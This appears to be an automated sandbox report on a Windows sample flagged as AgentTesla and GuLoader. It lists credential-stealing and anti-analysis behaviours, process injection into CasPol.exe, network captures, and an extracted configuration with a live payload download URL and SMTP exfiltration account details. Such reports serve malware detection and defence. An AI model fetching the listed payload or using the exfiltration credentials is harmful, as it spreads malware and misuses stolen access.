Edit tour

Windows Analysis Report
SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe

Overview

General Information

Sample Name:	SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe
Analysis ID:	659406
MD5:	6164a2f75a0c585d3256faecac344573
SHA1:	684171a971270ecef4e56293f7808e5989989d1d
SHA256:	c5e737000bb35f513800bfa5a9efd5c43a5771f1ae77fe4d4284a25111d4f9c8
Infos:

Detection

AgentTesla, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected AgentTesla

Yara detected GuLoader

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to detect Any.run

Tries to harvest and steal ftp login credentials

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

C2 URLs / IPs found in malware configuration

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to harvest and steal browser information (history, passwords, etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Drops certificate files (DER)

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Stores files to the Windows start menu directory

Yara detected Credential Stealer

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

PE file contains strange resources

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Detected TCP or UDP traffic on non-standard ports

Checks if the current process is being debugged

Contains functionality to detect virtual machines (SLDT)

Uses SMTP (mail sending)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64native

SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe (PID: 8772 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe" MD5: 6164A2F75A0C585D3256FAECAC344573)

CasPol.exe (PID: 3216 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)

CasPol.exe (PID: 4372 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)

conhost.exe (PID: 3160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "gonzalez@gonzalezestalote.comGonzalezBeba35mail.gonzalezestalote.comslims4417@gmail.com"}

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=download&id=1Pd9u4MvCgkvBmkO27OGhmEo8sWZCKhPL_n"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.1104819346.0000000002AC0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000004.00000000.900199931.0000000001390000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000004.00000002.5751179042.000000001DB41000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000004.00000002.5751179042.000000001DB41000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: CasPol.exe PID: 4372	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: CasPol.exe PID: 4372	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 1 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe

ReversingLabs: Detection: 21%

Source: 00000000.00000002.1104819346.0000000002AC0000.00000040.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1Pd9u4MvCgkvBmkO27OGhmEo8sWZCKhPL_n"}
Source: CasPol.exe.4372.4.memstrmin	Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "gonzalez@gonzalezestalote.comGonzalezBeba35mail.gonzalezestalote.comslims4417@gmail.com"}

Source: SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 142.250.186.78:443 -> 192.168.11.20:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.225:443 -> 192.168.11.20:49738 version: TLS 1.2

Source: SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	Code function: 0_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405C49
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	Code function: 0_2_00406873 FindFirstFileW,FindClose,	0_2_00406873
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	Code function: 0_2_0040290B FindFirstFileW,	0_2_0040290B

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Folketingsvalget160\Tatou\Borgerdyderne\	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Folketingsvalget160\Tatou\Borgerdyderne	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Folketingsvalget160\Tatou\Borgerdyderne\Husvildt\Eliteidrt\Remodified	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Folketingsvalget160\Tatou\Borgerdyderne\FOLKESANGEREN\JACKROLLING	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	File opened: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp	Jump to behavior

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://drive.google.com/uc?export=download&id=1Pd9u4MvCgkvBmkO27OGhmEo8sWZCKhPL_n

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Joe Sandbox View

IP Address: 185.101.224.45 185.101.224.45

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1Pd9u4MvCgkvBmkO27OGhmEo8sWZCKhPL HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/nh1k27nak7lbv5aqag412s4mssudfrf2/1657252875000/16799943050313356466/*/1Pd9u4MvCgkvBmkO27OGhmEo8sWZCKhPL?e=download&uuid=f3d0ce5e-3a8f-48f4-9bee-bdf0b7c9b76e HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0k-0s-docs.googleusercontent.comConnection: Keep-Alive

Source: global traffic

TCP traffic: 192.168.11.20:49749 -> 185.101.224.45:587

Source: global traffic

TCP traffic: 192.168.11.20:49749 -> 185.101.224.45:587

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: CasPol.exe, 00000004.00000002.5751179042.000000001DB41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: CasPol.exe, 00000004.00000002.5751179042.000000001DB41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
Source: CasPol.exe, 00000004.00000002.5751179042.000000001DB41000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5752554235.000000001DC30000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5752986004.000000001DC53000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5753308693.000000001DC7D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://HtsTzf40dpytHYvq.org
Source: CasPol.exe, 00000004.00000002.5751179042.000000001DB41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://HtsTzf40dpytHYvq.org0=5
Source: CasPol.exe, 00000004.00000002.5751179042.000000001DB41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://HtsTzf40dpytHYvq.orgt-
Source: CasPol.exe, 00000004.00000002.5751179042.000000001DB41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://UUaKae.com
Source: CasPol.exe, 00000004.00000002.5728527497.0000000001651000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5763292048.0000000020B70000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5760039892.000000001FCE4000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5753079794.000000001DC59000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cps.letsencrypt.org0
Source: folder-saved-search.png.0.dr	String found in binary or memory: http://creativecommons.org/licenses/by-sa/4.0/
Source: CasPol.exe, 00000004.00000003.1075374097.0000000001658000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.1079976348.0000000001653000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5728527497.0000000001651000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.1075768789.0000000001658000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: CasPol.exe, 00000004.00000003.1075374097.0000000001658000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.1079976348.0000000001653000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5728527497.0000000001651000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.1075768789.0000000001658000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: CasPol.exe, 00000004.00000002.5759212580.000000001FC40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: CasPol.exe, 00000004.00000002.5759212580.000000001FC40000.00000004.00000800.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.4.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: CasPol.exe, 00000004.00000002.5759864400.000000001FCC8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?83e7b5459006f
Source: CasPol.exe, 00000004.00000002.5760039892.000000001FCE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?83e7b54590
Source: CasPol.exe, 00000004.00000002.5753079794.000000001DC59000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://gonzalezestalote.com
Source: CasPol.exe, 00000004.00000002.5753079794.000000001DC59000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.gonzalezestalote.com
Source: SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: CasPol.exe, 00000004.00000002.5728527497.0000000001651000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5763292048.0000000020B70000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5760039892.000000001FCE4000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5753079794.000000001DC59000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://r3.i.lencr.org/0
Source: CasPol.exe, 00000004.00000002.5728527497.0000000001651000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5763292048.0000000020B70000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5760039892.000000001FCE4000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5753079794.000000001DC59000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://r3.o.lencr.org0
Source: CasPol.exe, 00000004.00000002.5763767522.0000000020BD5000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5759864400.000000001FCC8000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5728527497.0000000001651000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5763292048.0000000020B70000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5753079794.000000001DC59000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: CasPol.exe, 00000004.00000003.1221555927.000000001FD0D000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.1221139150.000000001FD06000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.1228880026.000000001FD08000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.1214700054.000000001FD06000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.1215152524.000000001FD0D000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5760039892.000000001FCE4000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.1226299470.000000001FD07000.00000004.00000800.00020000.00000000.sdmp, 2D85F72862B55C4EADD9E66E06947F3D0.4.dr	String found in binary or memory: http://x1.i.lencr.org/
Source: CasPol.exe, 00000004.00000002.5763767522.0000000020BD5000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5759864400.000000001FCC8000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5728527497.0000000001651000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5763292048.0000000020B70000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5753079794.000000001DC59000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: CasPol.exe, 00000004.00000002.5760039892.000000001FCE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org:80/
Source: CasPol.exe, 00000004.00000003.1075374097.0000000001658000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.1075768789.0000000001658000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external
Source: CasPol.exe, 00000004.00000003.1079976348.0000000001653000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5728527497.0000000001651000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://doc-0k-0s-docs.googleusercontent.com/
Source: CasPol.exe, 00000004.00000003.1079976348.0000000001653000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5728527497.0000000001651000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://doc-0k-0s-docs.googleusercontent.com/C
Source: CasPol.exe, 00000004.00000003.1075374097.0000000001658000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.1079976348.0000000001653000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5728150845.0000000001635000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5728527497.0000000001651000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.1075768789.0000000001658000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://doc-0k-0s-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/nh1k27na
Source: CasPol.exe, 00000004.00000002.5727597046.0000000001616000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5726396411.00000000015DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: CasPol.exe, 00000004.00000002.5726396411.00000000015DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/#
Source: CasPol.exe, 00000004.00000002.5727597046.0000000001616000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1Pd9u4MvCgkvBmkO27OGhmEo8sWZCKhPL
Source: CasPol.exe, 00000004.00000002.5751992526.000000001DBCD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/
Source: CasPol.exe, 00000004.00000002.5751992526.000000001DBCD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com//
Source: CasPol.exe, 00000004.00000002.5751992526.000000001DBCD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/https://login.live.com/
Source: CasPol.exe, 00000004.00000002.5751992526.000000001DBCD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/v104
Source: CasPol.exe, 00000004.00000002.5751992526.000000001DBCD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: CasPol.exe, 00000004.00000002.5751179042.000000001DB41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www

Source: unknown

DNS traffic detected: queries for: drive.google.com

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1Pd9u4MvCgkvBmkO27OGhmEo8sWZCKhPL HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/nh1k27nak7lbv5aqag412s4mssudfrf2/1657252875000/16799943050313356466/*/1Pd9u4MvCgkvBmkO27OGhmEo8sWZCKhPL?e=download&uuid=f3d0ce5e-3a8f-48f4-9bee-bdf0b7c9b76e HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0k-0s-docs.googleusercontent.comConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 142.250.186.78:443 -> 192.168.11.20:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.225:443 -> 192.168.11.20:49738 version: TLS 1.2

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe

Code function: 0_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004056DE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

Jump to dropped file

Source: SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe

Code function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_0040352D

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	Code function: 0_2_0040755C	0_2_0040755C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	Code function: 0_2_00406D85	0_2_00406D85
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	Code function: 0_2_70B21BFF	0_2_70B21BFF
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	Code function: 0_2_02AD3ECE	0_2_02AD3ECE
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	Code function: 0_2_02AD2572	0_2_02AD2572
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	Code function: 0_2_02AC5A80	0_2_02AC5A80
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	Code function: 0_2_02AC72FC	0_2_02AC72FC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	Code function: 0_2_02AC7609	0_2_02AC7609
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	Code function: 0_2_02AC6A1D	0_2_02AC6A1D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	Code function: 0_2_02AC5A6B	0_2_02AC5A6B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	Code function: 0_2_02AD4B87	0_2_02AD4B87
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	Code function: 0_2_02AD4F37	0_2_02AD4F37
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	Code function: 0_2_02AC7769	0_2_02AC7769
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	Code function: 0_2_02AC7342	0_2_02AC7342
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	Code function: 0_2_02AC6358	0_2_02AC6358
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	Code function: 0_2_02AD4CA0	0_2_02AD4CA0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	Code function: 0_2_02AC74FA	0_2_02AC74FA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	Code function: 0_2_02AC7405	0_2_02AC7405
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	Code function: 0_2_02AC75E7	0_2_02AC75E7
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	Code function: 0_2_02AC75C6	0_2_02AC75C6
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	Code function: 0_2_02ACB16D	0_2_02ACB16D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_012AF950	4_2_012AF950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_012A2A98	4_2_012A2A98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_012AB5E8	4_2_012AB5E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_012A37D8	4_2_012A37D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_012A7076	4_2_012A7076
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_012ADE31	4_2_012ADE31
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_012ADED8	4_2_012ADED8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_1DA1A160	4_2_1DA1A160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_1DA19890	4_2_1DA19890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_1DA19548	4_2_1DA19548
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_20ACEC30	4_2_20ACEC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_20ACD3D8	4_2_20ACD3D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_20AC1610	4_2_20AC1610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_20AD0040	4_2_20AD0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_20ADE140	4_2_20ADE140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_20AD5648	4_2_20AD5648
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_20ADBB80	4_2_20ADBB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_20AD33D0	4_2_20AD33D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_20ADBF30	4_2_20ADBF30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_21295860	4_2_21295860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_21290BA0	4_2_21290BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_21290B91	4_2_21290B91

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	Code function: 0_2_02AD3ECE LoadLibraryA,NtAllocateVirtualMemory,	0_2_02AD3ECE
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	Code function: 0_2_02AD6648 NtResumeThread,	0_2_02AD6648
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	Code function: 0_2_02AD5FDA NtProtectVirtualMemory,	0_2_02AD5FDA

Source: SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
